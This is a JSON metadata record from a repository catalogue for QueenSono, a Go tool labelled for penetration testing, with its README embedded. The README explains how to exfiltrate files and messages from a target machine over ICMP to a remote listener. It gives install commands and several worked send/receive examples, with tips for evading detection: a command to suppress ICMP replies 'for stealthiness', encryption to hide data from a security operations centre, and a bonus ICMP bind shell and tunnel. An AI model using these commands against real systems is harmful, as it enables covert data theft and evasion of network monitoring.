{"id":19544831,"url":"https://github.com/ariary/queensono","last_synced_at":"2025-04-26T19:31:43.576Z","repository":{"id":46285304,"uuid":"400831046","full_name":"ariary/QueenSono","owner":"ariary","description":"Golang binary for data exfiltration with ICMP protocol (+ ICMP bindshell, http over ICMP tunneling, ...)","archived":false,"fork":false,"pushed_at":"2021-12-10T10:18:54.000Z","size":11999,"stargazers_count":146,"open_issues_count":3,"forks_count":24,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-04-04T17:11:33.012Z","etag":null,"topics":["bindshell","data-exfiltration","golang","icmp","pentest","pentest-tool","tunneling"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ariary.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-08-28T15:49:30.000Z","updated_at":"2025-02-26T23:23:20.000Z","dependencies_parsed_at":"2022-09-26T17:41:07.362Z","dependency_job_id":null,"html_url":"https://github.com/ariary/QueenSono","commit_stats":null,"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2FQueenSono","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2FQueenSono/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2FQueenSono/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2FQueenSono/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ariary","download_url":"https://codeload.github.com/ariary/QueenSono/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251041406,"owners_count":21527186,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bindshell","data-exfiltration","golang","icmp","pentest","pentest-tool","tunneling"],"created_at":"2024-11-11T03:32:21.414Z","updated_at":"2025-04-26T19:31:42.682Z","avatar_url":"https://github.com/ariary.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003ch1 align=\"center\"\u003eQueenSono \u003ci\u003e ICMP Data Exfiltration \u003c/i\u003e\u003c/h1\u003e\n\n\u003cp align=\"center\"\u003e\u003cimg src=https://github.com/ariary/QueenSono/blob/main/img/qs-small.png\u003e\n\u003cbr\u003e\u003cbr\u003e\u003ca href=\"https://github.com/enaqx/awesome-pentest\"\u003e\u003cimg src=\"https://awesome.re/mentioned-badge.svg\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch4 align=\"center\"\u003eA Golang Package for Data Exfiltration with ICMP protocol.\u003c/h4\u003e\n\n\u003cp align=\"center\"\u003e\n  QueenSono tool only relies on the fact that ICMP protocol isn't monitored. It is quite common. It could also been used within a system with basic ICMP inspection (ie. frequency and content length watcher) or to bypass authentication step with captive portal (used by many public Wi-Fi to authenticate users after connecting to the Wi-Fi e.g Airport Wi-Fi). Try to imitate \u003ca href=\"https://github.com/ytisf/PyExfil\"\u003ePyExfil\u003c/a\u003e (and others) with the idea that the target machine does not necessary have python installed (so provide a binary could be useful)\n  \u003cbr\u003e\u003cbr\u003e\n  \u003cstrong\u003e\n    \u003ca href=\"https://github.com/ariary/QueenSono#install\"\u003eInstall it\u003c/a\u003e\n    ·\n    \u003ca href=\"https://github.com/ariary/QueenSono#usage\"\u003eUse it\u003c/a\u003e\n    ·\n    \u003ca href=\"https://github.com/ariary/QueenSono#notes\"\u003eNotes\u003c/a\u003e\n    ·\n    \u003ca href=\"https://github.com/ariary/QueenSono/issues\"\u003eRequest Feature\u003c/a\u003e\n    ·\n    \u003ca href=\"https://github.com/ariary/QueenSono/tree/main/hack\"\u003e🎁\u003c/a\u003e\n  \u003c/strong\u003e\n\u003c/p\u003e\n\n## Install\n\n### With `curl`\n\n*\u003e From release*\n\n```shell\ncurl -lO -L https://github.com/ariary/QueenSono/releases/latest/download/qsreceiver\ncurl -lO -L https://github.com/ariary/QueenSono/releases/latest/download/qssender\n```\n\n### With `go`\n\n*\u003e Via `go install`*\n\nMake sure `$GOPATH` is in your `$PATH` before\n\nInstall `qssender`\n\n```shell\ngo install github.com/ariary/QueenSono/cmd/client@latest\nmv $GOPATH/bin/client $GOPATH/bin/qssender #rename binary\n```\n\nInstall `qsreceiver`\n\n```shell\ngo install github.com/ariary/QueenSono/cmd/server@latest\nmv $GOPATH/bin/server $GOPATH/bin/qsreceiver #rename binary\n```\n*\\\u003e Install the binary from source*\n \nClone the repo and download the dependencies locally:\n```    \ngit clone https://github.com/ariary/QueenSono.git\ncd QueenSono\nmake before.build\n```\n\n To build the ICMP packet sender `qssender` :\n\n     build.queensono-sender\n    \n\n To build the ICMP packet receiver `qsreceiver` :\n\n     build.queensono-receiver\n## Usage\n\n`qssender` is the binary which will send ICMP packet  to the listener , so it is the binary you have to transfer on your target machine. \n\n`qsreceiver` is the listener on your local machine (or wherever you could receive icmp packet)\n\nAll commands and flags of the binaries could be found using `--help`\n\n### Example 1: Send with \"ACK\" 🔙\n*\\\u003e In this example we want to send a big file and look after echo reply to ackowledge the reception of the packets (ACK).*\n\n![demo](https://github.com/ariary/QueenSono/blob/main/img/qssono.gif)\n\nOn local machine:\n\n    $ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003eExplanation\u003c/b\u003e\u003c/summary\u003e\n    \u003cli\u003e\n    \u003ccode\u003e-l 0.0.0.0\u003c/code\u003elisten on all interfaces for ICMP packet\n    \u003c/li\u003e\n    \u003cli\u003e\n      \u003ccode\u003e-f received_bible.txt\u003c/code\u003e save received data in a file\n    \u003c/li\u003e\n    \u003cli\u003e\u003ccode\u003e-p\u003c/code\u003e show a progress bar of received data \u003c/li\u003e\n\n\u003c/details\u003e\n\n\nOn target machine:\n\n    $ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example)\n    $ qssender send file -d 2 -l 0.0.0.0 -r 10.0.0.92 -s 50000 bible.txt\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003eExplanation\u003c/b\u003e\u003c/summary\u003e\n    \u003cli\u003e\n    \u003ccode\u003esend file\u003c/code\u003e for sending file (\u003ccode\u003ebible.txt\u003c/code\u003e is the file in question)\n    \u003c/li\u003e\n    \u003cli\u003e\n      \u003ccode\u003e-d 2\u003c/code\u003e send a packet each 2 seconds\n    \u003c/li\u003e\n    \u003cli\u003e\u003ccode\u003e-l 0.0.0.0\u003c/code\u003e the listening address for \u003ci\u003eecho reply\u003c/i\u003e \u003c/li\u003e\n    \u003cli\u003e\u003ccode\u003e-r 10.0.0.92\u003c/code\u003e the address of my remote machine with \u003ccode\u003eqsreceiver\u003c/code\u003e listening\u003c/li\u003e\n    \u003cli\u003e\u003ccode\u003e-s 50000\u003c/code\u003e the data size I want to send in each packet\u003c/li\u003e\n\u003c/details\u003e\n\n\n### Example 2: Send without \"ACK\" 🙈\n*\\\u003e In this example we want to send a message without waiting for echo reply (it could be useful in  case the target firewall filters incoming icmp packet)*\n\n![demo](https://github.com/ariary/QueenSono/blob/main/img/qssono-trunc.gif?raw=true)\n\n\nOn local machine:\n\n    $ qsreceiver receive truncated 1 -l 0.0.0.0\n \n\n\u003cdetails\u003e\n  \u003csummary\u003e \u003cb\u003eExplanation\u003c/b\u003e\u003c/summary\u003e\n    \u003cli\u003e\u003ccode\u003ereceive truncated 1\u003c/code\u003e does not wait indefinitely if we don't received all the packets. (\u003ccode\u003e1\u003c/code\u003e is the delay used with \u003ccode\u003eqssender\u003c/code\u003e)\u003c/li\u003e\n\n\u003cbr\u003e\nfor stealthiness you could prevent the kernel to reply to any ICMP pings\n\n\u003cpre\u003e\u003ccode\u003eecho 1 | dd of=/proc/sys/net/ipv4/icmp_echo_ignore_all\u003c/code\u003e\u003c/pre\u003e\n\n\u003c/details\u003e\n\n\nOn target machine:\n\n    $ qssender send \"thisisatest i want to send a string w/o waiting for the echo reply\" -d 1 -l 0.0.0.0 -r 10.0.0.190 -s 1 -N\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003eExplanation\u003c/b\u003e\u003c/summary\u003e\n    \u003cli\u003e\n    \u003ccode\u003e-N\u003c/code\u003e noreply option (don't wait for \u003ci\u003eecho reply\u003c/i\u003e)\n    \u003c/li\u003e\n\u003c/details\u003e\n\n\n### Example 3: Send encrypted data 🔒\n*\\\u003e In this example we want to send an encrypted message. As the command line could be spied on we use asymmetric encryption (if the key leaks, it isn't an issue so)*\n\n![demo](https://github.com/ariary/QueenSono/blob/main/img/qssono-encryption.gif)\n\nOn local machine:\n\n    $ qsreceiver receive -l 0.0.0.0 --encrypt \n    \u003cOUTPUT PUBLIC KEY\u003e\n \n\n\u003cdetails\u003e\n  \u003csummary\u003e \u003cb\u003eExplanation\u003c/b\u003e\u003c/summary\u003e\n    \u003cli\u003e\u003ccode\u003e--encrypt \u003c/code\u003e use encryption exchange. It will generate public/private key. The public one will be used by \u003ccode\u003eqssender\u003c/code\u003e to encrypt data, the private one is used to decrypt it with \u003ccode\u003ereceiver\u003c/code\u003e\n\u003c/details\u003e\n\n\nOn target machine:\n```\n$ export MSG=\"\u003cyour message\u003e\"\n$ export KEY=\"\u003cpublic_key_from_qsreceiver_output\u003e\"\n$ qssender send $MSG -d 1 -l 0.0.0.0 -r 10.0.0.190 -s 5 --key $KEY\n```\n\n\u003cdetails\u003e\n  \u003csummary\u003eExplanation\u003c/summary\u003e\n    \u003cli\u003e\n    \u003ccode\u003e--key \u003c/code\u003e provide key for data encryption. Use the one provided by the \u003ccode\u003eqsreceiver\u003c/code\u003e command\n    \u003c/li\u003e\n\u003c/details\u003e\n\n#### About encryption\nRSA encrytion is used to keep data exchanged confidential. It could be useful for example to avoid a SoC to see what data is exchanged (or forensic) w/ basic analysis or simply for privacy.\n\nBut it comes with a cost. The choice of asymetric encryption is motivated by the fact that the encryption key is entered on the command line (so it could be retieved easily). Hence, we encrypt data with public key. Like this if someone retrieve the encryption key it will not be possible to decrypt the message. But the public key is smaller than the private one, so it ***encrypt smaller messages***. Also, ***it is computationally expensive***.\n\nAnother point, as we want to limit data size/ping requests (to avoid detection, bug, etc), **use encryption only if needed** ***as the message output-size will (should) always equal the size of the Modulus*** (part of the key) which is big.\n\n##### Enhancement\nCurrently, the whole message is encrypted and then chunked to be sent. On the other side we wait for all the packet (chunks), reconstruct our message and then decrypt it.\nBut it works ⇔ we have received ALL the chunks, otherwise the decryption will fail.\n\n\n=\u003e We  could encrypt each chunk accordingly with the `-s` parameter, like this we could decrypt them separately.\n\n\n### Bonus\n\nSee [hack](https://github.com/ariary/QueenSono/tree/main/hack) section for fun things with `QueenSono`:\n* Bind shell using ICMP\n* HTTP over ICMP tunneling\n\n### Notes\n- only work on Linux  (due to the use of golang net icmp package)\n- need `cap_net_raw` capabilities\n- if you actually send ICMP packets on 2 different machines and you wait for echo reply, be sure to use a reachable IP by remote as a listening address (do not use localhost or equivalent)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fqueensono","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fariary%2Fqueensono","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fqueensono/lists"}